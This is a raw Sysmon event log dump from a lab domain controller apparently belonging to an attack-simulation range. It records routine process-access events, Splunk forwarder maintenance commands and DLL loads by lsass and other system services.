09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4400-00000000FD01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.614{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD2-6151-4400-00000000FD01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.620{5EBD8912-8CD2-6151-4400-00000000FD01}3796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000001053589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.717{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000001053588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.479{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000001053587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.535{5EBD8912-8CD2-6151-4200-00000000FD01}37403744C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4200-00000000FD01}3740C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4200-00000000FD01}3740C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.292{5EBD8912-8CD2-6151-4100-00000000FD01}37203724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD2-6151-4200-00000000FD01}3740C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.297{5EBD8912-8CD2-6151-4200-00000000FD01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD2-6151-4100-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001053572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4100-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 